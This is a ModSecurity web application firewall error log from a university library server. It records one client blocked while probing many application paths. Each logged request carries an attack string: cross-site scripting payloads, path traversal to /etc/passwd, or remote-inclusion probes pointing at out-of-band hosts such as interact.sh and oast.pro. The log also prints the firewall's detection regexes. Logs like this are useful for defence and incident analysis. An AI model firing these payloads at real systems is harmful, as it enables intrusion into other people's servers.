[Tue Aug 29 11:51:15.841325 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAfWODsAAAAL"]
[Tue Aug 29 11:51:15.871167 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAkyyEIAAAAW"]
[Tue Aug 29 11:51:15.921012 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAnMeogAAAAD"]
[Tue Aug 29 11:51:16.597340 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAkyyEUAAAAW"]
[Tue Aug 29 11:51:17.723898 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAm@5w4AAAAH"]
[Tue Aug 29 11:51:17.847236 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAkr0E0AAAAC"]
[Tue Aug 29 11:51:20.535374 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAnIlf0AAAAV"]
[Tue Aug 29 11:51:20.623646 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAnMepIAAAAD"]
[Tue Aug 29 11:51:21.537085 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAm@5xcAAAAH"]
[Tue Aug 29 11:51:21.539899 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnMepMAAAAD"]
[Tue Aug 29 11:51:21.589208 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAmLPSYAAAAN"]
[Tue Aug 29 11:51:22.887928 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAmNp4MAAAAQ"]
[Tue Aug 29 11:51:22.939251 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAnTlJ8AAAAA"]
[Tue Aug 29 11:51:23.033676 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAm7m@IAAAAE"]
[Tue Aug 29 11:51:23.147764 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAm80OoAAAAF"]
[Tue Aug 29 11:51:23.798609 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnIlgYAAAAV"]
[Tue Aug 29 11:51:24.906097 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAm7m@YAAAAE"]
[Tue Aug 29 11:51:24.993569 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAnIlgoAAAAV"]
[Tue Aug 29 11:51:26.785393 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAm7m@gAAAAE"]
[Tue Aug 29 11:51:26.894635 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15TsCo-f0AAAlUli0AAAA0"]
[Tue Aug 29 11:51:27.008239 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/log"] [unique_id "ZO15T8Co-f0AAAm80PQAAAAF"]
[Tue Aug 29 11:51:27.033143 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15T8Co-f0AAAnIlg8AAAAV"]
[Tue Aug 29 11:51:27.597356 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAlUli8AAAA0"]
[Tue Aug 29 11:51:28.867572 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAnTlKsAAAAA"]
[Tue Aug 29 11:51:28.915272 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAm80PwAAAAF"]
[Tue Aug 29 11:51:28.915624 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAmQ-yAAAAAb"]
[Tue Aug 29 11:51:29.548365 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAm@5ykAAAAH"]
[Tue Aug 29 11:51:30.563588 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnHQfAAAAAT"]
[Tue Aug 29 11:51:30.573343 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15UsCo-f0AAAkr0G0AAAAC"]
[Tue Aug 29 11:51:30.580202 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAm@5ysAAAAH"]
